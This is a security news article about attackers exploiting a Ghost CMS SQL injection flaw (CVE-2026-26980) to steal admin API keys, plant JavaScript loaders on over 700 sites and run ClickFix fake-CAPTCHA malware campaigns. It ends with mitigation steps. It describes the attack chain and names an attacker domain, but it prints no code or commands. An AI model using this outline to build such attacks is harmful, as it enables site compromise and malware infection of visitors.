Hackers are actively exploiting a high-severity vulnerability in Ghost CMS to inject malicious scripts and run widespread ClickFix browser-based attacks across compromised websites.
Cybersecurity researchers have confirmed that threat actors are leveraging a critical SQL injection vulnerability in the Ghost CMS platform—tracked as CVE-2026-26980—to compromise more than 700 websites worldwide. The campaign has been linked to multiple threat groups and has been active since early May 2026.
The flaw, which carries a CVSS score of 9.4, was patched in February 2026 in Ghost CMS version 6.19.1 after being discovered through research involving AI-assisted security analysis.
How CVE-2026-26980 Enables Full Site Compromise
The vulnerability exists in Ghost CMS’s Content API and allows unauthenticated attackers to perform SQL injection attacks that can expose sensitive database information.
Security researchers at QiAnXin XLab report that attackers are abusing this weakness to extract administrative API keys from targeted websites. Once obtained, these credentials allow full control over site content through the Ghost Admin API.
With this level of access, attackers can directly modify published articles and inject malicious JavaScript code into legitimate web pages without detection.
Malicious JavaScript Used to Deliver ClickFix Attacks
Once a site is compromised, attackers inject JavaScript loaders into article pages. These scripts are designed as a two-stage payload delivery system that fetches additional malicious components from external servers at runtime.
The injected code connects to remote infrastructure such as clo4shara[.]xyz to retrieve dynamic payloads. Researchers note that this setup allows attackers to continuously change delivery mechanisms while keeping compromised websites functioning normally.
The external server also acts as a traffic distribution system, collecting browser fingerprinting data and determining how victims should be redirected or manipulated.
Advanced Evasion Through Traffic Cloaking Services
To avoid detection, attackers are using commercial cloaking services, including Adspect, to filter traffic and evade security scanners.
This technique ensures that security researchers, bots, and crawlers are shown harmless content, while real users are directed toward malicious payloads.
The system supports multiple command-based behaviors, including:
- Redirecting victims to malicious pages
- Displaying fake verification prompts
- Triggering downloads or pop-ups
- Executing custom JavaScript payloads
Fake CAPTCHA Leads to ClickFix Infection Chain
Victims who pass the cloaking filters are shown fake CAPTCHA pages designed to appear legitimate. These pages are used to initiate a ClickFix-style social engineering attack.
Users are instructed to copy a Base64-encoded command into the Windows Run dialog, unknowingly triggering a multi-stage infection process.
Once executed, the command downloads a ZIP archive containing malicious scripts. These scripts deploy PowerShell commands that fetch additional payloads, including DLL files or JavaScript-based loaders, depending on the attack variant.
In some cases, attackers use legitimate, code-signed binaries such as PuTTY to disguise malicious activity and reduce suspicion.
Persistent Malware and Remote Control Capabilities
Later-stage payloads install persistent malware on infected systems, including modified desktop clients based on open-source applications. These malicious tools regularly communicate with attacker-controlled servers, enabling remote execution of commands every few seconds.
Capabilities include:
- Running arbitrary JavaScript or executable files
- Maintaining long-term persistence on infected systems
- Receiving remote instructions from command-and-control servers
- Executing additional payloads on demand
Widespread Impact Across High-Value Sectors
The campaign has affected a wide range of industries, including:
- Universities and academic institutions
- Blockchain and cryptocurrency platforms
- AI and software-as-a-service (SaaS) providers
- Media organizations
- Financial technology companies
- Cybersecurity research sites
Security analysts warn that the use of legitimate, trusted websites significantly increases the success rate of these ClickFix attacks.
Mitigation and Security Recommendations
Ghost CMS administrators are strongly advised to take immediate action to reduce risk of compromise. Recommended steps include:
- Upgrade to Ghost CMS version 6.19.1 or later
- Rotate all administrative credentials and API keys
- Audit server and access logs for suspicious activity
- Remove any unauthorized scripts or injected content
- Notify users who may have visited compromised pages
- Monitor for unusual outbound traffic from CMS infrastructure
Conclusion
The exploitation of CVE-2026-26980 highlights how quickly CMS vulnerabilities can be weaponized at scale. By combining SQL injection, credential theft, and browser-based social engineering, attackers have successfully turned hundreds of legitimate websites into malware distribution platforms.
Security experts emphasize that timely patching and continuous monitoring remain critical defenses against fast-moving exploitation campaigns targeting popular web platforms like Ghost CMS.
